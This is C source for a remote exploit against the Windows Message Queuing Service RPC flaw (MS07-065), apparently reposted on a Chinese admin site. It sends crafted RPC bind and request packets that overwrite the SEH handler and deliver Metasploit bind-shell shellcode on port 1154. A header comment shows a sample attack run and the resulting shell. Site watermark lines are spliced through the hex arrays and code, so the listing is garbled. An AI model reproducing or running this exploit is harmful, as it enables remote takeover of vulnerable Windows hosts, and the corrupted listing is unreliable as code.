/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
you should know the dnsname of target to trigger this vuln
the service runs on port 2103/2105/2107
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
D:\soft\develop\MyProjects\temp\Debug>
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
网管有家bitscn.net
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>exit
exit
sent 5, rcvd 109: NOTSOCK
D:\>
*/
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
网管u家bitscn.net
// RPC Request Opnum: 0x06
char request_1[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00, // target's dns name (unicode)
0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
网管论坛bbs_bitsCN_com
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
中国网管联盟bitsCN.com 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
网管论坛bbs_bitsCN_com 0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
网管u家u.bitsCN.com 0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
网管u家www.bitscn.net 0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
网管论坛bbs_bitsCN_com 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
void usage(char *argv) {
网管u家bitscn.net
printf(" Usage: %s -h 127.0.0.1 (Universal exploit)\n",argv);
printf(" %s -h host [-p port]\n",argv);
printf(" Targets:\n");
exit(1);
}
/************* TCP connect *************************/
void Disconnect(SOCKET s);
// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
网管网www_bitscn_com if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
网管u家u.bitscn@com
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
/****************************************************/
int main(int argc, char * argv[]){
unsigned char * target = NULL;
int port = 2103;
int i;
int ret;
char buffer[6000] = {0};
SOCKET s;
WSADATA WSAData;
printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
网管论坛bbs_bitsCN_com
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf("--------------------------------------------------------------------------\n\n");
if (argc==1) usage(argv[0]); //Handle parameters
for(i=1;i<argc;i++) {
if ( (argv[i][0]=='-') ) {
switch (argv[i][1]) {
case 'h':
target=(unsigned char *)argv[i+1];
break;
case 'p':
if (strcmp(argv[i+1],"2103")==0) {
printf("[+] Attacking default port 2103\n");
网管u家bitscn.net
} else {
port=atoi(argv[i+1]);
}
break;
default:
printf("[-] Invalid argument: %s\n",argv[i]);
usage(argv[0]);
break;
}
i++;
} else usage(argv[0]);
}
/********************** attack payload ***************************/
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
网管u家u.bitscn@com
fprintf(stderr, "[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
//Sleep(1200);
s = Make_Connection((char *)target, port, 10);
if(s<0)
{
fprintf(stderr, "[-] connect err.\n");
exit(1);
}
//Send our evil Payload
网管网www_bitscn_com printf("[*]Sending our Payload, Good Luck! ^_^\n");
printf("[*]Sending RPC Bind String!\n");
send(s, bind_str, sizeof(bind_str), 0);
Sleep(1000);
printf("[*]Sending RPC Request Now!\n");
memset(buffer, '\x41', sizeof(buffer)); // fil the buffer to trigger seh
send(s, request_1, sizeof(request_1), 0);
send(s, buffer, 5104, 0); // fil the buffer to trigger seh
send(s, request_2, sizeof(request_2), 0);
网管bitscn_com
Sleep(100);
memset(buffer, 0, sizeof(buffer));
ret = recv(s, buffer, sizeof(buffer)-1, 0);
//printf("recv: %s\n", buffer);
Disconnect(s);
return 0;
}
评论加载中…